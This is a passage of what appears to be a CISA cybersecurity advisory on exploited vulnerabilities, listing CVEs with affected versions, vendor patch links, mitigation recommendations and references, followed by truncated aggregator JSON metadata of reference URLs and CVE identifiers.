APSB18-14](<https://helpx.adobe.com/security/products/coldfusion/apsb18-14.html>) \n[CVE-2015-4852](<https://nvd.nist.gov/vuln/detail/CVE-2015-4852>) | \n\n * Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0\n| \n\n * [Oracle Critical Patch Update Advisory - October 2016](<https://www.oracle.com/security-alerts/cpuoct2016.html>) \n[CVE-2020-2555](<https://nvd.nist.gov/vuln/detail/CVE-2020-2555>) | \n\n * Oracle Coherence product of Oracle Fusion Middleware; versions 3.7.1.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0\n| \n\n * [Oracle Critical Patch Update Advisory - January 2020](<https://www.oracle.com/security-alerts/cpujan2020.html>) \n[CVE-2019-3396](<https://nvd.nist.gov/vuln/detail/CVE-2019-3396>) | \n\n * Atlassian Confluence Server before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3, and from version 6.14.0 before 6.14.2\n| \n\n * [Jira Atlassian Confluence Server and Data Center: Remote code execution via Widget Connector macro - CVE-2019-3396](<https://jira.atlassian.com/browse/CONFSERVER-57974>) \n[CVE-2019-11580](<https://nvd.nist.gov/vuln/detail/CVE-2019-11580>) | \n\n * Atlassian Crowd and Crowd Data Center from version 2.1.0 before 3.0.5, from version 3.1.0 before 3.1.6, from version 3.2.0 before 3.2.8, from version 3.3.0 before 3.3.5, and from version 3.4.0 before 3.4.4\n| \n\n * [Jira Atlassian Crowd: Crowd - pdkinstall development plugin incorrectly enabled - CVE-2019-11580](<https://jira.atlassian.com/browse/CWD-5388>) \n[CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>) | \n\n * Zoho ManageEngine Desktop Central before 10.0.474\n| \n\n * [ManageEngine Desktop Central remote code execution vulnerability (CVE-2020-10189)](<https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html>) \n[CVE-2019-18935](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>) | \n\n * Progress Telerik UI for ASP.NET AJAX through 2019.3.1023\n| \n\n * 
[Telerik: ASP.NET AJAX: Allows JavaScriptSerializer Deserialization](<https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization>) \n[CVE-2020-0601](<https://nvd.nist.gov/vuln/detail/CVE-2020-0601>) | \n\n * Windows 10 for 32-bit Systems\n * Windows 10 for x64-based Systems\n * Windows 10 Version 1607 for 32-bit Systems\n * Windows 10 Version 1607 for x64-based Systems\n * Windows 10 Version 1709 for 32-bit Systems\n * Windows 10 Version 1709 for ARM64-based Systems\n * Windows 10 Version 1709 for x64-based Systems\n * Windows 10 Version 1803 for 32-bit Systems\n * Windows 10 Version 1803 for ARM64-based Systems\n * Windows 10 Version 1803 for x64-based Systems\n * Windows 10 Version 1809 for 32-bit Systems\n * Windows 10 Version 1809 for ARM64-based Systems\n * Windows 10 Version 1809 for x64-based Systems\n * Windows 10 Version 1903 for 32-bit Systems\n * Windows 10 Version 1903 for ARM64-based Systems\n * Windows 10 Version 1903 for x64-based Systems\n * Windows 10 Version 1909 for 32-bit Systems\n * Windows 10 Version 1909 for ARM64-based Systems\n * Windows 10 Version 1909 for x64-based Systems\n * Windows Server 2016\n * Windows Server 2016 (Server Core installation)\n * Windows Server 2019\n * Windows Server 2019 (Server Core installation)\n * Windows Server, version 1803 (Server Core Installation)\n * Windows Server, version 1903 (Server Core installation)\n * Windows Server, version 1909 (Server Core installation)\n| \n\n * [Microsoft Security Advisory for CVE-2020-0601](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0601>) \n[CVE-2019-0803](<https://nvd.nist.gov/vuln/detail/CVE-2019-0803>) | \n\n * Windows 10 for 32-bit Systems\n * Windows 10 for x64-based Systems\n * Windows 10 Version 1607 for 32-bit Systems\n * Windows 10 Version 1607 for x64-based Systems\n * Windows 10 Version 1703 for 32-bit Systems\n * Windows 10 Version 1703 for x64-based Systems\n * Windows 10 Version 1709 for 
32-bit Systems\n * Windows 10 Version 1709 for ARM64-based Systems\n * Windows 10 Version 1709 for x64-based Systems\n * Windows 10 Version 1803 for 32-bit Systems\n * Windows 10 Version 1803 for ARM64-based Systems\n * Windows 10 Version 1803 for x64-based Systems\n * Windows 10 Version 1809 for 32-bit Systems\n * Windows 10 Version 1809 for ARM64-based Systems\n * Windows 10 Version 1809 for x64-based Systems\n * Windows 7 for 32-bit Systems Service Pack 1\n * Windows 7 for x64-based Systems Service Pack 1\n * Windows 8.1 for 32-bit systems\n * Windows 8.1 for x64-based systems\n * Windows RT 8.1\n * Windows Server 2008 for 32-bit Systems Service Pack 2\n * Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)\n * Windows Server 2008 for Itanium-Based Systems Service Pack 2\n * Windows Server 2008 for x64-based Systems Service Pack 2\n * Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)\n * Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)\n * Windows Server 2012\n * Windows Server 2012 (Server Core installation)\n * Windows Server 2012 R2\n * Windows Server 2012 R2 (Server Core installation)\n * Windows Server 2016\n * Windows Server 2016 (Server Core installation)\n * Windows Server 2019\n * Windows Server 2019 (Server Core installation)\n * Windows Server, version 1803 (Server Core Installation)\n| \n\n * [Microsoft Security Advisory for CVE-2019-0803](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0803>) \n \n[CVE-2017-6327](<https://nvd.nist.gov/vuln/detail/CVE-2017-6327>) | \n\n * Symantec Messaging Gateway before 10.6.3-267\n| \n\n * [Broadcom Security Updates Detail for CVE-2017-6327 and CVE-2017-6328 
](<https://www.broadcom.com/support/security-center/securityupdates/detail?fid=security_advisory&pvid=security_advisory&year=&suid=20170810_00>) \n[CVE-2020-3118](<https://nvd.nist.gov/vuln/detail/CVE-2020-3118>) | \n\n * ASR 9000 Series Aggregation Services Routers\n * Carrier Routing System (CRS)\n * IOS XRv 9000 Router\n * Network Convergence System (NCS) 540 Series Routers\n * NCS 560 Series Routers\n * NCS 1000 Series Routers\n * NCS 5000 Series Routers\n * NCS 5500 Series Routers\n * NCS 6000 Series Routers\n| \n\n * [Cisco Security Advisory cisco-sa-20200205-iosxr-cdp-rce](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200205-iosxr-cdp-rce>) \n[CVE-2020-8515](<https://nvd.nist.gov/vuln/detail/CVE-2020-8515>) | \n\n * DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices\n| \n\n * [Draytek Security Advisory: Vigor3900 / Vigor2960 / Vigor300B Router Web Management Page Vulnerability (CVE-2020-8515)](<https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-\\(cve-2020-8515\\)/>) \n \n 2. **Implement rigorous configuration management programs. **Audit configuration management programs to ensure they can track and mitigate emerging threats. Review system configurations for misconfigurations and security weaknesses. Implementing a robust configuration and patch management program hinders sophisticated APT operations by limiting the effectiveness of opportunistic attacks. \n\n 3. **Disable unnecessary ports, protocols, and services.** Review network security device logs and determine whether to shut off unnecessary ports and protocols. Monitor common ports and protocols for C2 activity. Turn off or disable any unnecessary services or functionality within devices (e.g., universal plug and play [UPnP], PowerShell). \n\n 4. 
**Enhance monitoring of network and email traffic.** Review network signatures and indicators for focused operations activities, monitor for new phishing themes, and adjust email rules accordingly. Follow best practices of restricting attachments via email. Ensure that log information is aggregated and correlated to enable maximum detection capabilities, with a focus on monitoring for account misuse. \n\n 5. **Use protection capabilities to stop malicious activity.** Implement antivirus software and other endpoint protection capabilities to automatically detect and prevent malicious files from executing. Use network intrusion detection and prevention systems to identify and prevent commonly employed adversarial malware and limit nefarious data transfers.\n\n### Contact Information\n\nCISA encourages recipients of this report to contribute any additional information that they may have related to this threat. For any questions related to this report, please contact CISA at:\n\n * 1-888-282-0870 (From outside the United States: +1-703-235-8832)\n * [Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov>) (UNCLASS)\n\nCISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. 
Reporting forms can be found on the CISA homepage at <http://www.us-cert.cisa.gov/>.\n\n### References\n\n[[1] White House Publication: How China’s Economic Aggression Threatens the Technologies and Intellectual Property of the United States and the World](<https://www.whitehouse.gov/wp-content/uploads/2018/06/FINAL-China-Technology-Report-6.18.18-PDF.pdf>)\n\n[[2] Congressional Research Service: 'Made in China 2025' Industrial Policies: Issues for Congress](<https://fas.org/sgp/crs/row/IF10964.pdf>)\n\n[[3] Council on Foreign Relations: Is ‘Made in China 2025’ a Threat to Global Trade?](<https://www.cfr.org/backgrounder/made-china-2025-threat-global-trade>)\n\n[[4] Mandiant: APT1: Exposing One of China’s Cyber Espionage Units](<https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf>)\n\n[[5] U.S. Department of Justice (DOJ) Press Release: U.S. Charges Five Chinese Military Hackers for Cyber Espionage Against U.S. Corporations and a Labor Organization for Commercial Advantage](<https://www.justice.gov/opa/pr/us-charges-five-chinese-military-hackers-cyber-espionage-against-us-corporations-and-labor>)\n\n[[6] CISA Alert TA17-117A: Intrusions Affecting Multiple Victims Across Multiple Sectors](<https://us-cert.cisa.gov/ncas/alerts/TA17-117A>)\n\n[[7] DOJ Press Release: Deputy Attorney General Rod J. Rosenstein Announces Charges Against Chinese Hackers](<https://www.justice.gov/opa/speech/deputy-attorney-general-rod-j-rosenstein-announces-charges-against-chinese-hackers>)\n\n[[8] CISA Awareness Briefing: Chinese Cyber Activity Targeting Managed Service Providers](<https://us-cert.cisa.gov/sites/default/files/publications/Chinese-Cyber-Activity-Targeting-Managed-Service-Providers.pdf>)\n\n[[9] DOJ Press Release: Attorney General William P. 
Barr Announces Indictment of Four Members of China’s Military for Hacking into Equifax](<https://www.justice.gov/opa/speech/attorney-general-william-p-barr-announces-indictment-four-members-china-s-military>)\n\n[[10] CISA Press Release: FBI and CISA Warn Against Chinese Targeting of COVID-19 Research Organizations](<https://www.cisa.gov/news/2020/05/13/fbi-and-cisa-warn-against-chinese-targeting-covid-19-research-organizations>)\n\n[[11] CISA Alert AA20-126A: APT Groups Target Healthcare and Essential Services](<https://us-cert.cisa.gov/ncas/alerts/AA20126A>)\n\n[[12] CISA Current Activity (CA): Chinese Malicious Cyber Activity](<https://us-cert.cisa.gov/ncas/current-activity/2020/08/03/chinese-malicious-cyber-activity>)\n\n[[13] FireEye Advanced Persistent Threat Groups](<https://www.fireeye.com/current-threats/apt-groups.html>)\n\n[[14] MITRE ATT&CK: APT3](<https://attack.mitre.org/groups/G0022/>)\n\n[[15] MITRE ATT&CK: APT19](<https://attack.mitre.org/groups/G0073/>)\n\n[[16] MITRE ATT&CK: APT41](<https://attack.mitre.org/groups/G0096/>)\n\n[[17] CISA Alert AA20-133A: Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>)\n\n[[18] CISA Alert AA20-020A: Critical Vulnerability in Citrix Application Delivery Controller, Gateway, and SD-WAN WANOP](<https://us-cert.cisa.gov/ncas/alerts/aa20-020a>)\n\n[[19] CISA CA: F5 Releases Security Advisory for BIG-IP TMUI RCE Vulnerability, CVE-2020-5902](<https://us-cert.cisa.gov/ncas/current-activity/2020/07/04/f5-releases-security-advisory-big-ip-tmui-rce-vulnerability-cve>)\n\n[[20] CISA Alert AA20-133A: Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>)\n\n[[21] NSA Advisory: Chinese State-Sponsored Actors Exploit Publicly Known Vulnerabilities](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>)\n\n### Revisions\n\n * October 1, 2020: Initial version\n * October 20, 2020: Recommended 
Actions section updated
"NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 10.0, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-275a", "reporter": "Industrial Control Systems Cyber Emergency Response Team", "references": ["https://attack.mitre.org/matrices/enterprise/", "https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF", "https://us-cert.cisa.gov/report", "https://www.whitehouse.gov/wp-content/uploads/2018/06/FINAL-China-Technology-Report-6.18.18-PDF.pdf", "https://fas.org/sgp/crs/row/IF10964.pdf", "https://www.cfr.org/backgrounder/made-china-2025-threat-global-trade", "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", "https://www.justice.gov/opa/pr/us-charges-five-chinese-military-hackers-cyber-espionage-against-us-corporations-and-labor", "https://us-cert.cisa.gov/ncas/alerts/TA17-117A", "https://www.justice.gov/opa/speech/deputy-attorney-general-rod-j-rosenstein-announces-charges-against-chinese-hackers", 
"https://us-cert.cisa.gov/sites/default/files/publications/Chinese-Cyber-Activity-Targeting-Managed-Service-Providers.pdf", "https://www.justice.gov/opa/speech/attorney-general-william-p-barr-announces-indictment-four-members-china-s-military", "https://www.cisa.gov/news/2020/05/13/fbi-and-cisa-warn-against-chinese-targeting-covid-19-research-organizations", "https://us-cert.cisa.gov/ncas/alerts/AA20126A", "https://us-cert.cisa.gov/ncas/current-activity/2020/08/03/chinese-malicious-cyber-activity%20", "https://attack.mitre.org/tactics/TA0015/", "https://attack.mitre.org/tactics/TA0026/", "https://attack.mitre.org/tactics/TA0025/", "https://attack.mitre.org/techniques/T1330/", "https://attack.mitre.org/techniques/T1334/", "https://attack.mitre.org/techniques/T1326/", "https://attack.mitre.org/techniques/T1247/", "https://attack.mitre.org/techniques/T1254/", "https://attack.mitre.org/techniques/T1288/", "https://attack.mitre.org/techniques/T1362", "https://attack.mitre.org/techniques/T1027/", "https://attack.mitre.org/techniques/T1566/001/", "https://attack.mitre.org/techniques/T1566/002/", "https://attack.mitre.org/techniques/T1016/", "https://attack.mitre.org/techniques/T1059/003/", "https://attack.mitre.org/techniques/T1204/002/", "https://attack.mitre.org/techniques/T1547/001/", "https://attack.mitre.org/techniques/T1059/001/", "https://attack.mitre.org/techniques/T1574/002/", "https://attack.mitre.org/techniques/T1105/", "https://attack.mitre.org/techniques/T1018/", "https://attack.mitre.org/techniques/T1072/", "https://attack.mitre.org/techniques/T1110/003/", "https://attack.mitre.org/techniques/T1046/", "https://attack.mitre.org/techniques/T1114/", "https://attack.mitre.org/techniques/T1090/002/", "https://attack.mitre.org/techniques/T1189/", "https://attack.mitre.org/techniques/T1505/003/", "https://attack.mitre.org/techniques/T1071/002/", "https://attack.mitre.org/techniques/T1071/004/", "https://www.fireeye.com/current-threats/apt-groups.html", 
"https://attack.mitre.org/groups/G0022/", "https://attack.mitre.org/groups/G0073/", "https://attack.mitre.org/groups/G0096/", "https://us-cert.cisa.gov/ncas/alerts/aa20-133a%20", "https://us-cert.cisa.gov/ncas/alerts/aa20-020a", "https://us-cert.cisa.gov/ncas/current-activity/2020/07/04/f5-releases-security-advisory-big-ip-tmui-rce-vulnerability-cve", "https://us-cert.cisa.gov/ncas/alerts/aa20-133a%20", "https://nvd.nist.gov/vuln/detail/CVE-2012-0158", "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-027", "https://nvd.nist.gov/vuln/detail/CVE-2020-5902", "https://support.f5.com/csp/article/K52145254", "https://nvd.nist.gov/vuln/detail/CVE-2019-19781", "https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/", "https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/", "https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/", "https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/", "https://nvd.nist.gov/vuln/detail/CVE-2019-11510", "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101", "https://nvd.nist.gov/vuln/detail/CVE-2019-16920", "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10124", "https://nvd.nist.gov/vuln/detail/CVE-2019-16278", "https://packetstormsecurity.com/files/155045/Nostromo-1.9.6-Directory-Traversal-Remote-Command-Execution.html", "https://packetstormsecurity.com/files/155802/nostromo-1.9.6-Remote-Code-Execution.html", "https://nvd.nist.gov/vuln/detail/CVE-2019-1652", "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject", "https://nvd.nist.gov/vuln/detail/CVE-2019-1653", "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info", "https://nvd.nist.gov/vuln/detail/CVE-2020-10189", 
"https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html", "https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF", "https://nvd.nist.gov/vuln/detail/CVE-2020-8193", "https://support.citrix.com/article/CTX276688", "https://nvd.nist.gov/vuln/detail/CVE-2020-8195", "https://support.citrix.com/article/CTX276688", "https://nvd.nist.gov/vuln/detail/CVE-2020-8196", "https://support.citrix.com/article/CTX276688", "https://nvd.nist.gov/vuln/detail/CVE-2019-0708", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708", "https://nvd.nist.gov/vuln/detail/CVE-2020-15505", "https://www.mobileiron.com/en/blog/mobileiron-security-updates-available", "https://nvd.nist.gov/vuln/detail/CVE-2020-1350", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1350", "https://nvd.nist.gov/vuln/detail/CVE-2020-1472", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472", "https://nvd.nist.gov/vuln/detail/CVE-2020-1040", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1040", "https://nvd.nist.gov/vuln/detail/CVE-2018-6789", "https://exim.org/static/doc/security/CVE-2018-6789.txt", "https://git.exim.org/exim.git/commit/cf3cd306062a08969c41a1cdd32c6855f1abecf1", "https://nvd.nist.gov/vuln/detail/CVE-2020-0688", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688", "https://nvd.nist.gov/vuln/detail/CVE-2018-4939", "https://helpx.adobe.com/security/products/coldfusion/apsb18-14.html", "https://nvd.nist.gov/vuln/detail/CVE-2015-4852", "https://www.oracle.com/security-alerts/cpuoct2016.html", "https://nvd.nist.gov/vuln/detail/CVE-2020-2555", "https://www.oracle.com/security-alerts/cpujan2020.html", "https://nvd.nist.gov/vuln/detail/CVE-2019-3396", "https://jira.atlassian.com/browse/CONFSERVER-57974", "https://nvd.nist.gov/vuln/detail/CVE-2019-11580", 
"https://jira.atlassian.com/browse/CWD-5388", "https://nvd.nist.gov/vuln/detail/CVE-2020-10189", "https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html", "https://nvd.nist.gov/vuln/detail/CVE-2019-18935", "https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization", "https://nvd.nist.gov/vuln/detail/CVE-2020-0601", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0601", "https://nvd.nist.gov/vuln/detail/CVE-2019-0803", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0803", "https://nvd.nist.gov/vuln/detail/CVE-2017-6327", "https://www.broadcom.com/support/security-center/securityupdates/detail?fid=security_advisory&pvid=security_advisory&year=&suid=20170810_00", "https://nvd.nist.gov/vuln/detail/CVE-2020-3118", "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200205-iosxr-cdp-rce", "https://nvd.nist.gov/vuln/detail/CVE-2020-8515", "https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)/", "http://www.us-cert.cisa.gov/", "https://www.whitehouse.gov/wp-content/uploads/2018/06/FINAL-China-Technology-Report-6.18.18-PDF.pdf", "https://fas.org/sgp/crs/row/IF10964.pdf", "https://www.cfr.org/backgrounder/made-china-2025-threat-global-trade", "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", "https://www.justice.gov/opa/pr/us-charges-five-chinese-military-hackers-cyber-espionage-against-us-corporations-and-labor", "https://us-cert.cisa.gov/ncas/alerts/TA17-117A", "https://www.justice.gov/opa/speech/deputy-attorney-general-rod-j-rosenstein-announces-charges-against-chinese-hackers", "https://us-cert.cisa.gov/sites/default/files/publications/Chinese-Cyber-Activity-Targeting-Managed-Service-Providers.pdf", 
"https://www.justice.gov/opa/speech/attorney-general-william-p-barr-announces-indictment-four-members-china-s-military", "https://www.cisa.gov/news/2020/05/13/fbi-and-cisa-warn-against-chinese-targeting-covid-19-research-organizations", "https://us-cert.cisa.gov/ncas/alerts/AA20126A", "https://us-cert.cisa.gov/ncas/current-activity/2020/08/03/chinese-malicious-cyber-activity", "https://www.fireeye.com/current-threats/apt-groups.html", "https://attack.mitre.org/groups/G0022/", "https://attack.mitre.org/groups/G0073/", "https://attack.mitre.org/groups/G0096/", "https://us-cert.cisa.gov/ncas/alerts/aa20-133a", "https://us-cert.cisa.gov/ncas/alerts/aa20-020a", "https://us-cert.cisa.gov/ncas/current-activity/2020/07/04/f5-releases-security-advisory-big-ip-tmui-rce-vulnerability-cve", "https://us-cert.cisa.gov/ncas/alerts/aa20-133a", "https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF"], "cvelist": ["CVE-2012-0158", "CVE-2015-4852", "CVE-2017-6327", "CVE-2017-6328", "CVE-2018-4939", "CVE-2018-6789", "CVE-2019-0708", "CVE-2019-0803", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-16278", "CVE-2019-1652", "CVE-2019-1653", "CVE-2019-16920", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2020-0601", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-1040", 
"CVE-2020-1350", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-2555", "CVE-2020-3118", "CVE-2020-5902", "CVE-2020-6789", "CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8515", "CVE-2022-42475", "CVE-2022-47966"], "immutableFields": [], "lastseen": "2023-09-23T07:29:31", "viewCount": 12, "enchantments": {"dependencies": {"references": [{"type": "0daydb", "idList": ["0DAYDB:137B89027DF0ADFC87056CE176A77441", "0DAYDB:7673EE0281A214ED87D52BA25B8C65BA", "0DAYDB:AF426AEE507511B61499B493AB5C0D11", "0DAYDB:C05243B3F6EF6FD2D281FAA1565DB0D6"]}, {"type": "adobe", "idList": ["APSB18-14"]}, {"type": "almalinux", "idList": ["ALSA-2021:1647"]}, {"type": "alpinelinux", "idList": ["ALPINE:CVE-2018-6789", "ALPINE:CVE-2020-0601", "ALPINE:CVE-2020-1472"]}, {"type": "altlinux", "idList": ["FD4483A7DF9B7189B007C0C774CA4588"]}, {"type": "amazon", "idList": ["ALAS-2018-970", "ALAS-2021-1469", "ALAS2-2021-1585", "ALAS2-2021-1649"]}, {"type": "archlinux", "idList": ["ASA-201802-6", "ASA-202009-17"]}, {"type": "atlassian", "idList": ["ATLASSIAN:CONFSERVER-57971", "ATLASSIAN:CONFSERVER-57974", "ATLASSIAN:CWD-5388", "CONFSERVER-57971", "CONFSERVER-57974", "CWD-5388"]}, {"type": "attackerkb", "idList": ["AKB:028F0B15-BECA-49C5-9195-C76E72BD1A88", "AKB:03ABAD00-322E-4905-B8D2-E3DA9F049145", "AKB:0C69B33C-2322-4075-BE16-A92593B75107", "AKB:12F253E0-F6F2-4628-A989-57A36E8C7026", "AKB:131226A6-A1E9-48A1-A5D0-AC94BAF8DFD2", "AKB:17442CEB-043D-4879-BE5C-FC920511E791", "AKB:184727B8-42D7-4361-B5C7-D262882D9E08", "AKB:1A38FF57-43D7-4AFE-9E56-6A773F2B88AE", "AKB:1DE0ADEC-8107-491A-BC8F-DCC3BF6EB3AB", "AKB:1EB6A6AA-8081-4030-BC12-58CFD5C47668", "AKB:236680FB-F804-4F5D-B51D-4B50C9F69BBD", "AKB:255908B4-BA2B-4575-84E5-63690A0110AE", "AKB:2941EA77-EC87-4EFE-8B5C-AD997AEB5502", "AKB:3014CE3B-5D5F-4310-AB9F-3023E9B7126C", "AKB:30E011CE-C422-42D7-BC8C-EFFC7B3B11A3", "AKB:353C2E5C-D0A4-444E-B1B0-B9778B7197F5", "AKB:3AC01970-2631-4B37-B354-4040C1A7E983", "AKB:3EC4F6E5-7F60-42EF-9218-009F7538748C", 
"AKB:43680748-EEC0-4395-9572-2A3534D61D88", "AKB:4501BDF0-F0BC-4E58-ABDB-5A03E74B412F", "AKB:4DF5EF01-8CC5-4A65-87F7-E627FAA3F022", "AKB:63C1E977-B118-475C-8C47-1046B294E1BA", "AKB:67DD67D3-33BC-455C-98A3-7DD0E1D4613D", "AKB:69741DFD-3169-4113-B9D5-F2D752453CCA", "AKB:71A48C9F-C37B-4C1A-AD30-456EF1B66CF9", "AKB:71F77351-1AE5-4161-8836-D26680828466", "AKB:75221F03-CFA1-478E-9777-568E523E3272", "AKB:75573626-39F0-4E95-928D-7603C6E049EF", "AKB:7C5703D3-9E18-4F5C-A4D2-25E1F09B43CB", "AKB:7CB9D781-D42B-49AD-8368-7833414FD76A", "AKB:862DFB64-EE07-4F1F-B5F3-8F2C3A560A5F", "AKB:86915DE7-C5F7-483B-A324-DF5B1929FBF6", "AKB:86F390BB-7946-4223-970A-D493D6DD1E0A", "AKB:90047E82-FDD8-47DB-9552-50D104A34230", "AKB:90DDDBF9-EA58-4470-B821-C35007A64BD6", "AKB:9BE08048-B58F-4ECA-9DF9-EC2241B34B52", "AKB:A4BDBFB9-4493-4EF5-8C05-276721F6549F", "AKB:AFC76977-D355-470D-A7F6-FEF7A8352B65", "AKB:B669B32B-AB1B-463C-9375-8B727DB33A24", "AKB:B7C679E9-6ECB-4663-BF1E-330295E69CC4", "AKB:B8A2FA01-8796-4335-8BF4-45147E14AFC9", "AKB:B983621D-529B-4375-AA6C-0DB0FBBF9A94", "AKB:BFDD9A54-15E2-4C3F-A140-DA45C72DACDA", "AKB:C2ACFFE9-0D4E-48C9-9099-E5FEBB6401EA", "AKB:D432D14A-94A1-4099-B6F6-959B6EF2A545", "AKB:D87D8B3A-B6C4-4B59-A2EF-577C30171961", "AKB:E152B863-E927-4417-BC7B-1472E48FD3A1", "AKB:E6BD4207-BAC0-40E1-A4C8-92B6D3D58D4B", "AKB:E88B8795-0434-4AC5-B3D5-7E3DAB8A60C1", "AKB:ED05D93E-5B20-4B44-BAC8-C4CB5B46254A", "AKB:EF56F4A3-B95C-4CA0-9E19-BA58E1295785", "AKB:F0223615-0DEB-4BCC-8CF7-F9CED07F1876", "AKB:F05BE8C2-C144-45BE-BF46-5867A2CAAF15", "AKB:FDF5A3A7-D224-432D-A61A-88CFCB4B9799", "AKB:FE22EC16-B49C-437E-B677-8EFFCE66A738"]}, {"type": "avleonov", "idList": ["AVLEONOV:13BED8E5AD26449401A37E1273217B9A", "AVLEONOV:1ABE5F69187E5F9F8625DA462772F80C", "AVLEONOV:28E47C69DA4A069031694EB4C2C931BA", "AVLEONOV:4FCA3B316DF1BAA7BC038015245D9813", "AVLEONOV:56C5888A0A7E36482CFC39A438BADAB3", "AVLEONOV:6A714F9BC2BBE696D3586B2629169491", "AVLEONOV:7DAB33D28205885E8979C4C664958CDC", 
"AVLEONOV:7E0DF6DEBB35FB55F6B4D33A7262A422", "AVLEONOV:93A5CCFA19B815AE15942F533FFD65C4", "AVLEONOV:B0F649A99B171AC3032AF71B1DCCFE34", "AVLEONOV:C227E6D768CE965E884A2A9208D66579", "AVLEONOV:F17F36C3CC642EBDC27E43900FE3905E", "AVLEONOV:FEA9E4494A95F04BD598867C8CA5D246"]}, {"type": "canvas", "idList": ["BLUEKEEP", "BRIGHTMAIL_RESTORE", "CONFLUENCE_MACRO_LFI", "DDE_CLOSEHANDLE_LPE", "EXIM_HEAP_OVERFLOW", "MS12_027", "NETSCALER_TRAVERSAL_RCE", "OWA_RCE", "WEBLOGIC_T3_DESERIALIZATION"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:19B4E04F8F1723A4F28FA7A8354698AF", "CARBONBLACK:83C94B14C546544713E49B16CCCBF672", "CARBONBLACK:91F55D2B8B2999589579EACB1542A3E9", "CARBONBLACK:971FEABEB6DA17E9D4D3137981B2B685", "CARBONBLACK:A526657711947788A54505B0330C16A0", "CARBONBLACK:B2094018923AC88282ED4B94CB24F28B", "CARBONBLACK:F60F48DF14A6916346C8A04C16AFB756"]}, {"type": "centos", "idList": ["CESA-2020:5439"]}, {"type": "cert", "idList": ["VU:261385", "VU:290915", "VU:490028", "VU:576313", "VU:619785", "VU:766427", "VU:849224", "VU:927237"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2012-129", "CPAI-2012-130", "CPAI-2012-131", "CPAI-2012-132", "CPAI-2012-133", "CPAI-2014-1384", "CPAI-2015-1321", "CPAI-2017-0728", "CPAI-2018-0772", "CPAI-2018-1694", 